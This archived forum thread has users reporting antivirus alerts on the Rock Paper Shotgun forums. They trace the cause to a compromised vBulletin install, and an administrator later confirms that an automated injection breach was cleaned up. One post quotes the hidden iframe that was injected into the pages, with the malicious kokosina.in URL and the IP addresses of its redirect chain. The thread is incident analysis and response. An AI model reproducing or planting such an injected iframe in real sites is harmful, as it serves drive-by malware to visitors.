PDA

View Full Version : RPS Forums Site Contains Malicious Ware?



squirrel
20-12-2011, 12:51 PM
I am using avast! and here is the warning by it whenever I turn to a new page within the forum:

Infection Details

URL:http://kokosina.in/1Process:file://C:\Program Files (x86)\Mozilla Fi...Infection:al
I suspect it's the advertisement that has problem as the background advertisement is currently blocked by my machine.

It's so creepy zako!

thegooseking
20-12-2011, 12:53 PM
I posted about this in forum feedback. It's affecting a lot of vBulletin sites and there's a thread about it here (https://www.vbulletin.com/forum/showthread.php/392637-Kokosina-in-Anyone-Else-Getting-This).

lhzr
20-12-2011, 02:07 PM
yeah, i get this too.

should we consider our passwords stolen ? what does this kokosina thing do ?

Vexing Vision
20-12-2011, 02:27 PM
Same, but I get the error message also for the main page, where background ads are running fine.

Kaira-
20-12-2011, 05:34 PM
Not sure if it's been there always, but I noticed that browser attempts to connect to 212.224.112.13, and whois for that seems like this:


inetnum: 212.224.112.0 - 212.224.112.255
netname: DE-FORNEX
descr: www.fornex.com, Fornex Hosting S.L
country: DE
admin-c: COLO-RIPE
tech-c: COLO-RIPE
remarks: -------------------------------------------------------
remarks: --- please report spam/abuse to abuse@first-colo.de ---
remarks: ---- reports to other addresses won't be processed ----
remarks: -------------------------------------------------------
status: ASSIGNED PA
mnt-by: MNT-FIRSTCOLO
source: RIPE # Filtered

role: First Colo Ripe Coordination
address: First Colo GmbH
address: Kastelburgstr. 74c
address: D-81245 Muenchen
address: Germany
phone: +49-(0)800-25557777
fax-no: +49-(0)800-25557770
abuse-mailbox: abuse@first-colo.de
remarks:
remarks: * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
remarks: * Complaints about Internet Abuse like SPAM, Hack Attacks, Scans, etc. *
remarks: * please mail to: --> abuse [@] first-colo [.] net <-- *
remarks: * Requests from law enforcement (only!), send fax to: +49 800 25557770 *
remarks: * Inquiries can only be processed, if sent to the correct address. *
remarks: * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
remarks:
admin-c: MAVE-RIPE
tech-c: MAVE-RIPE
nic-hdl: COLO-RIPE
mnt-by: MNT-FIRSTCOLO
source: RIPE # Filtered

% Information related to '212.224.64.0/18AS44066'

route: 212.224.64.0/18
descr: First Colo via AS44066
origin: AS44066
mnt-by: MNT-FIRSTCOLO
source: RIPE # Filtered

% Information related to '212.224.112.0/20AS44066'

route: 212.224.112.0/20
descr: First Colo via AS44066
origin: AS44066
mnt-by: MNT-FIRSTCOLO
source: RIPE # Filtered

Miker
20-12-2011, 06:08 PM
Same here, I had to put RPS in my exceptions just to get here.

Duckee
20-12-2011, 06:51 PM
It is also flagged by Opera as a malware threat.

Megagun
20-12-2011, 09:30 PM
WARNING: do NOT visit any of the links I'm about to post unless you know what you're doing, you think you know what you're doing, or you don't care what happens to your PC either way. That said, some of these links I'm about to post should be safe, and I'll mark them as such.

Yep, there's definitively something wrong here. This is what I found inside the source of this page:

<div style="display:none;"><iframe src="http://kokosina.in/t/go.php?sid=5" width="38" height="67" border="0" frameborder="0"></iframe></div>

Awesome, an iFrame!
Wgetting the kokosina.in URL gives me a 302 redirect to
http://212.224.112.13/nicto141211/c057cc4c4388afa8baf248cbaecfa8e7/spl.php
Following that, we get another 302 redirect to
http://212.224.112.13/nicto141211/c057cc4c4388afa8baf248cbaecfa8e7/0.php
Which in turn redirects to http://www.google.com/robots.txt for some reason, which is rather odd... Why would they redirect me to google's robots.txt?

EDIT: the iFrame is injected by the following bit of javascript code:
http://pastebin.com/XsmMHBza (this should be safe to visit if you want to look at some JavaScript, but don't be alarmed if your virus scanner thinks this is a virus, too. Some do that).

I've seen that kind of thing before. Nasty decoding/evalling stuff. This bit of javascript is hosted at

http://kokosina.in/1

Virustotal's output for that little bit of Javascript (http://www.virustotal.com/file-scan/report.html?id=7830a483024aa0a4531062248b41ac55990 8d54d34c198ea1116b9fdbd649b39-1324401100) (this is a safe link). Oddly enough, it's not detected by many virus scanners, but I bet that they do detect whatever the output of that bit of Javascript is (the actual iFrame injection).

EDIT: Checked the link posted by thegooseking, which says the following:

You're using vBulletin 4.1.3. There are several exploits in that version that were fixed in subsequent versions and security patches. You should upgrade to vBulletin 4.1.9. You also need to make sure your addons are up to date so that they don't have potential exploits in them.
The RPS forums are running 4.1.3. There are known exploits for that version. The forum software should be updated. Someone used a known exploit to inject some code (probably automatically), which means they probably have (had?) access to the server, which may mean that they know your password, depending on what they modified. Be vigilant, but changing your password now may be a bit silly until the forum software has been patched to deal with this intrusion. That said, I know that vBulletin by default uses some proper salting techniques, so you might be somewhat safe (again, depending on which files were modified, and in what way they were modified).

Ice-Fyre
22-12-2011, 11:54 AM
Sooo is the site safe now or not...

Kodeen
22-12-2011, 11:57 AM
Sooo is the site safe now or not...

They upgraded the forum version, I'm assuming in response to this thread, so ... maybe?

Jams O'Donnell
22-12-2011, 12:09 PM
Yes, the malware has been eliminated.

Megagun
22-12-2011, 04:20 PM
Regardless, change your password and remember to change it on other websites where you used the same password. If someone was able to inject an iFrame, they were able to inject other nasty stuff.

As far as I was able to detect, the nasty bits we talked about in this thread have been cleaned up and fixed. Not sure if there's more nastyness somewhere else, but at least this particular case of nastyness has been dealt with.

Wooly Wugga Wugga
22-12-2011, 05:01 PM
Would be nice if RPS could post a quick bit on the front page that they've been compromised and that people should consider taking protective measures.

Smashbox
22-12-2011, 05:21 PM
Or at least a thread...

Megagun
26-12-2011, 12:04 AM
*tumbleweed*

DigitalSignalX
26-12-2011, 12:43 AM
Didn't the upgrade to 4.1.9 fix it?

Megagun
26-12-2011, 11:43 PM
Yes, it may have (it depends on what the breach was and if anything other than the forum software was affected), but no-one who has an account here and happens to read the "Rock, Paper Shotgun Discussion" forum would know about what happened, and nowhere was anything clarified with regards to what happened and how severe the breach was.

Right now, we have to assume that all passwords and user accounts/e-mail addresses were stolen, until we hear some official words regarding these matters (and proper investigation has been done). This also means that not sending a mass-email out to anyone who has an account here is a huge oversight.

kirrus
11-01-2012, 02:50 PM
I've been meaning to post for a while, sorry, didn't quite get round to it.

The forums were breached by an injection vulnerability in vBulletin. It was an automated breach - very, very little human involvement. It didn't go beyond the forums - the main site was unaffected (hence it staying online when we took the forums offline). As far as we can determine, they didn't steal any data, and only injected nefarious code into the site. It was cleaned out after we took the forums down - we took a copy of the code, reloaded the forum files from backups, updated the forums and brought them back online.

As to password security, they are stored salted and encrypted. As with any security matter, using the same password on multiple sites, as tempting as it is, is a bad idea, and we recommend against you doing that.

The reason an email didn't go out, was due to the lack of data theft - be assured, we would ask the RPS team to let you know if we did have evidence of emails/passwords/usernames being downloaded.

richmondster
08-06-2014, 06:29 AM
oh men, i hope i dont get that malware. awww. (my comp is sensitive)

QuantaCat
08-06-2014, 08:44 PM
last warning, stop posting on threads just to get your post count up. This is a thread that stopped being useful two years ago.